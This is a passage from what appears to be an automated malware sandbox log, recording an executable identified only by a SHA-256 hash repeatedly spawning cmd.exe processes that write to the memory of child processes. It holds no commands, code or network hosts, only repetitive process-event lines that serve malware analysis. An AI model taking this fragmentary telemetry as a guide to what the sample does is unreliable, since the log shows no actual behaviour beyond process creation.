710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1144 PID 1096 wrote to memory of 960 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1144 PID 960 wrote to memory of 1744 960 cmd.exe 1146 PID 960 wrote to memory of 1744 960 cmd.exe 1146 PID 960 wrote to memory of 1744 960 cmd.exe 1146 PID 960 wrote to memory of 1744 960 cmd.exe 1146 PID 960 wrote to memory of 1656 960 cmd.exe 1147 PID 960 wrote to memory of 1656 960 cmd.exe 1147 PID 960 wrote to memory of 1656 960 cmd.exe 1147 PID 960 wrote to memory of 1656 960 cmd.exe 1147 PID 960 wrote to memory of 320 960 cmd.exe 1148 PID 960 wrote to memory of 320 960 cmd.exe 1148 PID 960 wrote to memory of 320 960 cmd.exe 1148 PID 960 wrote to memory of 320 960 cmd.exe 1148 PID 320 wrote to memory of 212 320 cmd.exe 1149 PID 320 wrote to memory of 212 320 cmd.exe 1149 PID 320 wrote to memory of 212 320 cmd.exe 1149 PID 320 wrote to memory of 212 320 cmd.exe 1149 PID 960 wrote to memory of 108 960 cmd.exe 1150 PID 960 wrote to memory of 108 960 cmd.exe 1150 PID 960 wrote to memory of 108 960 cmd.exe 1150 PID 960 wrote to memory of 108 960 cmd.exe 1150 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1151 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1151 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1151 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1151 PID 1476 wrote to memory of 888 1476 cmd.exe 1153 PID 1476 wrote to memory of 888 1476 cmd.exe 1153 PID 1476 wrote to memory of 888 1476 cmd.exe 1153 PID 1476 wrote to memory of 888 1476 cmd.exe 1153 PID 1476 wrote to memory of 1212 1476 cmd.exe 1154 PID 1476 wrote to memory of 1212 1476 cmd.exe 1154 PID 1476 wrote to memory of 1212 1476 cmd.exe 1154 PID 1476 wrote to memory of 1212 1476 cmd.exe 1154 PID 1476 wrote to memory of 712 1476 cmd.exe 1155 PID 1476 wrote to memory of 712 1476 cmd.exe 1155 PID 1476 wrote to memory of 712 1476 cmd.exe 1155 PID 1476 wrote to memory of 712 1476 cmd.exe 1155 PID 712 wrote to memory of 1376 712 cmd.exe 1156 PID 712 wrote to memory of 1376 712 cmd.exe 1156 PID 712 wrote to memory of 1376 712 cmd.exe 1156 PID 712 wrote to memory of 1376 712 cmd.exe 1156 PID 1476 wrote to memory of 204 1476 cmd.exe 1157 PID 1476 wrote to memory of 204 1476 cmd.exe 1157 PID 1476 wrote to memory of 204 1476 cmd.exe 1157 PID 1476 wrote to memory of 204 1476 cmd.exe 1157 PID 1096 wrote to memory of 1480 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1158 PID 1096 wrote to memory of 1480 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1158 PID 1096 wrote to memory of 1480 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1158 PID 1096 wrote to memory of 1480 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1158 PID 1480 wrote to memory of 1548 1480 cmd.exe 1160 PID 1480 wrote to memory of 1548 1480 cmd.exe 1160 PID 1480 wrote to memory of 1548 1480 cmd.exe 1160 PID 1480 wrote to memory of 1548 1480 cmd.exe 1160 PID 1480 wrote to memory of 1836 1480 cmd.exe 1161 PID 1480 wrote to memory of 1836 1480 cmd.exe 1161 PID 1480 wrote to memory of 1836 1480 cmd.exe 1161 PID 1480 wrote to memory of 1836 1480 cmd.exe 1161 PID 1480 wrote to memory of 1408 1480 cmd.exe 1162 PID 1480 wrote to memory of 1408 1480 cmd.exe 1162 PID 1480 wrote to memory of 1408 1480 cmd.exe 1162 PID 1480 wrote to memory of 1408 1480 cmd.exe 1162 PID 1408 wrote to memory of 1976 1408 cmd.exe 1163 PID 1408 wrote to memory of 1976 1408 cmd.exe 1163 PID 1408 wrote to memory of 1976 1408 cmd.exe 1163 PID 1408 wrote to memory of 1976 1408 cmd.exe 1163 PID 1480 wrote to memory of 1676 1480 cmd.exe 1164 PID 1480 wrote to memory of 1676 1480 cmd.exe 1164 PID 1480 wrote to memory of 1676 1480 cmd.exe 1164 PID 1480 wrote to memory of 1676 1480 cmd.exe 1164 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1165 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1165 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1165 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1165 PID 1144 wrote to memory of 1744 1144 cmd.exe 1167 PID 1144 wrote to memory of 1744 1144 cmd.exe 1167 PID 1144 wrote to memory of 1744 1144 cmd.exe 1167 PID 1144 wrote to memory of 1744 1144 cmd.exe 1167 PID 1144 wrote to memory of 1656 1144 cmd.exe 1168 PID 1144 wrote to memory of 1656 1144 cmd.exe 1168 PID 1144 wrote to memory of 1656 1144 cmd.exe 1168 PID 1144 wrote to memory of 1656 1144 cmd.exe 1168 PID 1144 wrote to memory of 1516 1144 cmd.exe 1169 PID 1144 wrote to memory of 1516 1144 cmd.exe 1169 PID 1144 wrote to memory of 1516 1144 cmd.exe 1169 PID 1144 wrote to memory of 1516 1144 cmd.exe 1169 PID 1516 wrote to memory of 1076 1516 cmd.exe 1170 PID 1516 wrote to memory of 1076 1516 cmd.exe 1170 PID 1516 wrote to memory of 1076 1516 cmd.exe 1170 PID 1516 wrote to memory of 1076 1516 cmd.exe 1170 PID 1144 wrote to memory of 108 1144 cmd.exe 1171 PID 1144 wrote to memory of 108 1144 cmd.exe 1171 PID 1144 wrote to memory of 108 1144 cmd.exe 1171 PID 1144 wrote to memory of 108 1144 cmd.exe 1171 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1172 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1172 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1172 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1172 PID 1120 wrote to memory of 888 1120 cmd.exe 1174 PID 1120 wrote to memory of 888 1120 cmd.exe 1174 PID 1120 wrote to memory of 888 1120 cmd.exe 1174 PID 1120 wrote to memory of 888 1120 cmd.exe 1174 PID 1120 wrote to memory of 1212 1120 cmd.exe 1175 PID 1120 wrote to memory of 1212 1120 cmd.exe 1175 PID 1120 wrote to memory of 1212 1120 cmd.exe 1175 PID 1120 wrote to memory of 1212 1120 cmd.exe 1175 PID 1120 wrote to memory of 2016 1120 cmd.exe 1176 PID 1120 wrote to memory of 2016 1120 cmd.exe 1176 PID 1120 wrote to memory of 2016 1120 cmd.exe 1176 PID 1120 wrote to memory of 2016 1120 cmd.exe 1176 PID 2016 wrote to memory of 1376 2016 cmd.exe 1177 PID 2016 wrote to memory of 1376 2016 cmd.exe 1177 PID 2016 wrote to memory of 1376 2016 cmd.exe 1177 PID 2016 wrote to memory of 1376 2016 cmd.exe 1177 PID 1120 wrote to memory of 1956 1120 cmd.exe 1178 PID 1120 wrote to memory of 1956 1120 cmd.exe 1178 PID 1120 wrote to memory of 1956 1120 cmd.exe 1178 PID 1120 wrote to memory of 1956 1120 cmd.exe 1178 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1179 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1179 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1179 PID 1096 wrote to memory of 1476 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1179 PID 1476 wrote to memory of 896 1476 cmd.exe 1181 PID 1476 wrote to memory of 896 1476 cmd.exe 1181 PID 1476 wrote to memory of 896 1476 cmd.exe 1181 PID 1476 wrote to memory of 896 1476 cmd.exe 1181 PID 1476 wrote to memory of 1836 1476 cmd.exe 1182 PID 1476 wrote to memory of 1836 1476 cmd.exe 1182 PID 1476 wrote to memory of 1836 1476 cmd.exe 1182 PID 1476 wrote to memory of 1836 1476 cmd.exe 1182 PID 1476 wrote to memory of 1152 1476 cmd.exe 1183 PID 1476 wrote to memory of 1152 1476 cmd.exe 1183 PID 1476 wrote to memory of 1152 1476 cmd.exe 1183 PID 1476 wrote to memory of 1152 1476 cmd.exe 1183 PID 1152 wrote to memory of 1976 1152 cmd.exe 1184 PID 1152 wrote to memory of 1976 1152 cmd.exe 1184 PID 1152 wrote to memory of 1976 1152 cmd.exe 1184 PID 1152 wrote to memory of 1976 1152 cmd.exe 1184 PID 1476 wrote to memory of 972 1476 cmd.exe 1185 PID 1476 wrote to memory of 972 1476 cmd.exe 1185 PID 1476 wrote to memory of 972 1476 cmd.exe 1185 PID 1476 wrote to memory of 972 1476 cmd.exe 1185 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1186 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1186 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1186 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1186 PID 1652 wrote to memory of 1816 1652 cmd.exe 1188 PID 1652 wrote to memory of 1816 1652 cmd.exe 1188 PID 1652 wrote to memory of 1816 1652 cmd.exe 1188 PID 1652 wrote to memory of 1816 1652 cmd.exe 1188 PID 1652 wrote to memory of 1740 1652 cmd.exe 1189 PID 1652 wrote to memory of 1740 1652 cmd.exe 1189 PID 1652 wrote to memory of 1740 1652 cmd.exe 1189 PID 1652 wrote to memory of 1740 1652 cmd.exe 1189 PID 1652 wrote to memory of 212 1652 cmd.exe 1190 PID 1652 wrote to memory of 212 1652 cmd.exe 1190 PID 1652 wrote to memory of 212 1652 cmd.exe 1190 PID 1652 wrote to memory of 212 1652 cmd.exe 1190 PID 212 wrote to memory of 112 212 cmd.exe 1191 PID 212 wrote to memory of 112 212 cmd.exe 1191 PID 212 wrote to memory of 112 212 cmd.exe 1191 PID 212 wrote to memory of 112 212 cmd.exe 1191 PID 1652 wrote to memory of 1560 1652 cmd.exe 1192 PID 1652 wrote to memory of 1560 1652 cmd.exe 1192 PID 1652 wrote to memory of 1560 1652 cmd.exe 1192 PID 1652 wrote to memory of 1560 1652 cmd.exe 1192 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1193 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1193 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1193 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1193 PID 856 wrote to memory of 1688 856 cmd.exe 1195 PID 856 wrote to memory of 1688 856 cmd.exe 1195 PID 856 wrote to memory of 1688 856 cmd.exe 1195 PID 856 wrote to memory of 1688 856 cmd.exe 1195 PID 856 wrote to memory of 1512 856 cmd.exe 1196 PID 856 wrote to memory of 1512 856 cmd.exe 1196 PID 856 wrote to memory of 1512 856 cmd.exe 1196 PID 856 wrote to memory of 1512 856 cmd.exe 1196 PID 856 wrote to memory of 1792 856 cmd.exe 1197 PID 856 wrote to memory of 1792 856 cmd.exe 1197 PID 856 wrote to memory of 1792 856 cmd.exe 1197 PID 856 wrote to memory of 1792 856 cmd.exe 1197 PID 1792 wrote to memory of 1068 1792 cmd.exe 1198 PID 1792 wrote to memory of 1068 1792 cmd.exe 1198 PID 1792 wrote to memory of 1068 1792 cmd.exe 1198 PID 1792 wrote to memory of 1068 1792 cmd.exe 1198 PID 856 wrote to memory of 204 856 cmd.exe 1199 PID 856 wrote to memory of 204 856 cmd.exe 1199 PID 856 wrote to memory of 204 856 cmd.exe 1199 PID 856 wrote to memory of 204 856 cmd.exe 1199 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1200 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1200 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1200 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1200 PID 224 wrote to memory of 1832 224 cmd.exe 1202 PID 224 wrote to memory of 1832 224 cmd.exe 1202 PID 224 wrote to memory of 1832 224 cmd.exe 1202 PID 224 wrote to memory of 1832 224 cmd.exe 1202 PID 224 wrote to memory of 1284 224 cmd.exe 1203 PID 224 wrote to memory of 1284 224 cmd.exe 1203 PID 224 wrote to memory of 1284 224 cmd.exe 1203 PID 224 wrote to memory of 1284 224 cmd.exe 1203 PID 224 wrote to memory of 532 224 cmd.exe 1204 PID 224 wrote to memory of 532 224 cmd.exe 1204 PID 224 wrote to memory of 532 224 cmd.exe 1204 PID 224 wrote to memory of 532 224 cmd.exe 1204 PID 532 wrote to memory of 2032 532 cmd.exe 1205 PID 532 wrote to memory of 2032 532 cmd.exe 1205 PID 532 wrote to memory of 2032 532 cmd.exe 1205 PID 532 wrote to memory of 2032 532 cmd.exe 1205 PID 224 wrote to memory of 316 224 cmd.exe 1206 PID 224 wrote to memory of 316 224 cmd.exe 1206 PID 224 wrote to memory of 316 224 cmd.exe 1206 PID 224 wrote to memory of 316 224 cmd.exe 1206 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1207 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1207 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1207 PID 1096 wrote to memory of 1500 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1207 PID 1500 wrote to memory of 948 1500 cmd.exe 1209 PID 1500 wrote to memory of 948 1500 cmd.exe 1209 PID 1500 wrote to memory of 948 1500 cmd.exe 1209 PID 1500 wrote to memory of 948 1500 cmd.exe 1209 PID 1500 wrote to memory of 1996 1500 cmd.exe 1210 PID 1500 wrote to memory of 1996 1500 cmd.exe 1210 PID 1500 wrote to memory of 1996 1500 cmd.exe 1210 PID 1500 wrote to memory of 1996 1500 cmd.exe 1210 PID 1500 wrote to memory of 1504 1500 cmd.exe 1211 PID 1500 wrote to memory of 1504 1500 cmd.exe 1211 PID 1500 wrote to memory of 1504 1500 cmd.exe 1211 PID 1500 wrote to memory of 1504 1500 cmd.exe 1211 PID 1504 wrote to memory of 1516 1504 cmd.exe 1212 PID 1504 wrote to memory of 1516 1504 cmd.exe 1212 PID 1504 wrote to memory of 1516 1504 cmd.exe 1212 PID 1504 wrote to memory of 1516 1504 cmd.exe 1212 PID 1500 wrote to memory of 1624 1500 cmd.exe 1213 PID 1500 wrote to memory of 1624 1500 cmd.exe 1213 PID 1500 wrote to memory of 1624 1500 cmd.exe 1213 PID 1500 wrote to memory of 1624 1500 cmd.exe 1213 PID 1096 wrote to memory of 1372 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1214 PID 1096 wrote to memory of 1372 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1214 PID 1096 wrote to memory of 1372 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1214 PID 1096 wrote to memory of 1372 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1214 PID 1372 wrote to memory of 620 1372 cmd.exe 1216 PID 1372 wrote to memory of 620 1372 cmd.exe 1216 PID 1372 wrote to memory of 620 1372 cmd.exe 1216 PID 1372 wrote to memory of 620 1372 cmd.exe 1216 PID 1372 wrote to memory of 1212 1372 cmd.exe 1217 PID 1372 wrote to memory of 1212 1372 cmd.exe 1217 PID 1372 wrote to memory of 1212 1372 cmd.exe 1217 PID 1372 wrote to memory of 1212 1372 cmd.exe 1217 PID 1372 wrote to memory of 712 1372 cmd.exe 1218 PID 1372 wrote to memory of 712 1372 cmd.exe 1218 PID 1372 wrote to memory of 712 1372 cmd.exe 1218 PID 1372 wrote to memory of 712 1372 cmd.exe 1218 PID 712 wrote to memory of 2016 712 cmd.exe 1219 PID 712 wrote to memory of 2016 712 cmd.exe 1219 PID 712 wrote to memory of 2016 712 cmd.exe 1219 PID 712 wrote to memory of 2016 712 cmd.exe 1219 PID 1372 wrote to memory of 1956 1372 cmd.exe 1220 PID 1372 wrote to memory of 1956 1372 cmd.exe 1220 PID 1372 wrote to memory of 1956 1372 cmd.exe 1220 PID 1372 wrote to memory of 1956 1372 cmd.exe 1220 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1221 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1221 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1221 PID 1096 wrote to memory of 1052 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1221 PID 1052 wrote to memory of 1548 1052 cmd.exe 1223 PID 1052 wrote to memory of 1548 1052 cmd.exe 1223 PID 1052 wrote to memory of 1548 1052 cmd.exe 1223 PID 1052 wrote to memory of 1548 1052 cmd.exe 1223 PID 1052 wrote to memory of 1836 1052 cmd.exe 1224 PID 1052 wrote to memory of 1836 1052 cmd.exe 1224 PID 1052 wrote to memory of 1836 1052 cmd.exe 1224 PID 1052 wrote to memory of 1836 1052 cmd.exe 1224 PID 1052 wrote to memory of 1408 1052 cmd.exe 1225 PID 1052 wrote to memory of 1408 1052 cmd.exe 1225 PID 1052 wrote to memory of 1408 1052 cmd.exe 1225 PID 1052 wrote to memory of 1408 1052 cmd.exe 1225 PID 1408 wrote to memory of 1152 1408 cmd.exe 1226 PID 1408 wrote to memory of 1152 1408 cmd.exe 1226 PID 1408 wrote to memory of 1152 1408 cmd.exe 1226 PID 1408 wrote to memory of 1152 1408 cmd.exe 1226 PID 1052 wrote to memory of 1480 1052 cmd.exe 1227 PID 1052 wrote to memory of 1480 1052 cmd.exe 1227 PID 1052 wrote to memory of 1480 1052 cmd.exe 1227 PID 1052 wrote to memory of 1480 1052 cmd.exe 1227 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1228 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1228 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1228 PID 1096 wrote to memory of 1120 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1228 PID 1120 wrote to memory of 1744 1120 cmd.exe 1230 PID 1120 wrote to memory of 1744 1120 cmd.exe 1230 PID 1120 wrote to memory of 1744 1120 cmd.exe 1230 PID 1120 wrote to memory of 1744 1120 cmd.exe 1230 PID 1120 wrote to memory of 1740 1120 cmd.exe 1231 PID 1120 wrote to memory of 1740 1120 cmd.exe 1231 PID 1120 wrote to memory of 1740 1120 cmd.exe 1231 PID 1120 wrote to memory of 1740 1120 cmd.exe 1231 PID 1120 wrote to memory of 1860 1120 cmd.exe 1232 PID 1120 wrote to memory of 1860 1120 cmd.exe 1232 PID 1120 wrote to memory of 1860 1120 cmd.exe 1232 PID 1120 wrote to memory of 1860 1120 cmd.exe 1232 PID 1860 wrote to memory of 212 1860 cmd.exe 1233 PID 1860 wrote to memory of 212 1860 cmd.exe 1233 PID 1860 wrote to memory of 212 1860 cmd.exe 1233 PID 1860 wrote to memory of 212 1860 cmd.exe 1233 PID 1120 wrote to memory of 960 1120 cmd.exe 1234 PID 1120 wrote to memory of 960 1120 cmd.exe 1234 PID 1120 wrote to memory of 960 1120 cmd.exe 1234 PID 1120 wrote to memory of 960 1120 cmd.exe 1234 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1235 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1235 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1235 PID 1096 wrote to memory of 1040 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1235 PID 1040 wrote to memory of 1872 1040 cmd.exe 1237 PID 1040 wrote to memory of 1872 1040 cmd.exe 1237 PID 1040 wrote to memory of 1872 1040 cmd.exe 1237 PID 1040 wrote to memory of 1872 1040 cmd.exe 1237 PID 1040 wrote to memory of 1512 1040 cmd.exe 1238 PID 1040 wrote to memory of 1512 1040 cmd.exe 1238 PID 1040 wrote to memory of 1512 1040 cmd.exe 1238 PID 1040 wrote to memory of 1512 1040 cmd.exe 1238 PID 1040 wrote to memory of 1112 1040 cmd.exe 1239 PID 1040 wrote to memory of 1112 1040 cmd.exe 1239 PID 1040 wrote to memory of 1112 1040 cmd.exe 1239 PID 1040 wrote to memory of 1112 1040 cmd.exe 1239 PID 1112 wrote to memory of 1792 1112 cmd.exe 1240 PID 1112 wrote to memory of 1792 1112 cmd.exe 1240 PID 1112 wrote to memory of 1792 1112 cmd.exe 1240 PID 1112 wrote to memory of 1792 1112 cmd.exe 1240 PID 1040 wrote to memory of 1008 1040 cmd.exe 1241 PID 1040 wrote to memory of 1008 1040 cmd.exe 1241 PID 1040 wrote to memory of 1008 1040 cmd.exe 1241 PID 1040 wrote to memory of 1008 1040 cmd.exe 1241 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1242 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1242 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1242 PID 1096 wrote to memory of 1144 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1242 PID 1144 wrote to memory of 896 1144 cmd.exe 1244 PID 1144 wrote to memory of 896 1144 cmd.exe 1244 PID 1144 wrote to memory of 896 1144 cmd.exe 1244 PID 1144 wrote to memory of 896 1144 cmd.exe 1244 PID 1144 wrote to memory of 1284 1144 cmd.exe 1245 PID 1144 wrote to memory of 1284 1144 cmd.exe 1245 PID 1144 wrote to memory of 1284 1144 cmd.exe 1245 PID 1144 wrote to memory of 1284 1144 cmd.exe 1245 PID 1144 wrote to memory of 1276 1144 cmd.exe 1246 PID 1144 wrote to memory of 1276 1144 cmd.exe 1246 PID 1144 wrote to memory of 1276 1144 cmd.exe 1246 PID 1144 wrote to memory of 1276 1144 cmd.exe 1246 PID 1276 wrote to memory of 1092 1276 cmd.exe 1247 PID 1276 wrote to memory of 1092 1276 cmd.exe 1247 PID 1276 wrote to memory of 1092 1276 cmd.exe 1247 PID 1276 wrote to memory of 1092 1276 cmd.exe 1247 PID 1144 wrote to memory of 1808 1144 cmd.exe 1248 PID 1144 wrote to memory of 1808 1144 cmd.exe 1248 PID 1144 wrote to memory of 1808 1144 cmd.exe 1248 PID 1144 wrote to memory of 1808 1144 cmd.exe 1248 PID 1096 wrote to memory of 1364 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1249 PID 1096 wrote to memory of 1364 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1249 PID 1096 wrote to memory of 1364 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1249 PID 1096 wrote to memory of 1364 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1249 PID 1364 wrote to memory of 228 1364 cmd.exe 1251 PID 1364 wrote to memory of 228 1364 cmd.exe 1251 PID 1364 wrote to memory of 228 1364 cmd.exe 1251 PID 1364 wrote to memory of 228 1364 cmd.exe 1251 PID 1364 wrote to memory of 1996 1364 cmd.exe 1252 PID 1364 wrote to memory of 1996 1364 cmd.exe 1252 PID 1364 wrote to memory of 1996 1364 cmd.exe 1252 PID 1364 wrote to memory of 1996 1364 cmd.exe 1252 PID 1364 wrote to memory of 1800 1364 cmd.exe 1253 PID 1364 wrote to memory of 1800 1364 cmd.exe 1253 PID 1364 wrote to memory of 1800 1364 cmd.exe 1253 PID 1364 wrote to memory of 1800 1364 cmd.exe 1253 PID 1800 wrote to memory of 1504 1800 cmd.exe 1254 PID 1800 wrote to memory of 1504 1800 cmd.exe 1254 PID 1800 wrote to memory of 1504 1800 cmd.exe 1254 PID 1800 wrote to memory of 1504 1800 cmd.exe 1254 PID 1364 wrote to memory of 1980 1364 cmd.exe 1255 PID 1364 wrote to memory of 1980 1364 cmd.exe 1255 PID 1364 wrote to memory of 1980 1364 cmd.exe 1255 PID 1364 wrote to memory of 1980 1364 cmd.exe 1255 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1256 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1256 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1256 PID 1096 wrote to memory of 224 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1256 PID 224 wrote to memory of 888 224 cmd.exe 1258 PID 224 wrote to memory of 888 224 cmd.exe 1258 PID 224 wrote to memory of 888 224 cmd.exe 1258 PID 224 wrote to memory of 888 224 cmd.exe 1258 PID 224 wrote to memory of 1212 224 cmd.exe 1259 PID 224 wrote to memory of 1212 224 cmd.exe 1259 PID 224 wrote to memory of 1212 224 cmd.exe 1259 PID 224 wrote to memory of 1212 224 cmd.exe 1259 PID 224 wrote to memory of 1068 224 cmd.exe 1260 PID 224 wrote to memory of 1068 224 cmd.exe 1260 PID 224 wrote to memory of 1068 224 cmd.exe 1260 PID 224 wrote to memory of 1068 224 cmd.exe 1260 PID 1068 wrote to memory of 712 1068 cmd.exe 1261 PID 1068 wrote to memory of 712 1068 cmd.exe 1261 PID 1068 wrote to memory of 712 1068 cmd.exe 1261 PID 1068 wrote to memory of 712 1068 cmd.exe 1261 PID 224 wrote to memory of 204 224 cmd.exe 1262 PID 224 wrote to memory of 204 224 cmd.exe 1262 PID 224 wrote to memory of 204 224 cmd.exe 1262 PID 224 wrote to memory of 204 224 cmd.exe 1262 PID 1096 wrote to memory of 608 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1263 PID 1096 wrote to memory of 608 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1263 PID 1096 wrote to memory of 608 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1263 PID 1096 wrote to memory of 608 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1263 PID 608 wrote to memory of 820 608 cmd.exe 1265 PID 608 wrote to memory of 820 608 cmd.exe 1265 PID 608 wrote to memory of 820 608 cmd.exe 1265 PID 608 wrote to memory of 820 608 cmd.exe 1265 PID 608 wrote to memory of 896 608 cmd.exe 1266 PID 608 wrote to memory of 896 608 cmd.exe 1266 PID 608 wrote to memory of 896 608 cmd.exe 1266 PID 608 wrote to memory of 896 608 cmd.exe 1266 PID 608 wrote to memory of 1284 608 cmd.exe 1267 PID 608 wrote to memory of 1284 608 cmd.exe 1267 PID 608 wrote to memory of 1284 608 cmd.exe 1267 PID 608 wrote to memory of 1284 608 cmd.exe 1267 PID 1284 wrote to memory of 1408 1284 cmd.exe 1268 PID 1284 wrote to memory of 1408 1284 cmd.exe 1268 PID 1284 wrote to memory of 1408 1284 cmd.exe 1268 PID 1284 wrote to memory of 1408 1284 cmd.exe 1268 PID 608 wrote to memory of 1276 608 cmd.exe 1269 PID 608 wrote to memory of 1276 608 cmd.exe 1269 PID 608 wrote to memory of 1276 608 cmd.exe 1269 PID 608 wrote to memory of 1276 608 cmd.exe 1269 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1270 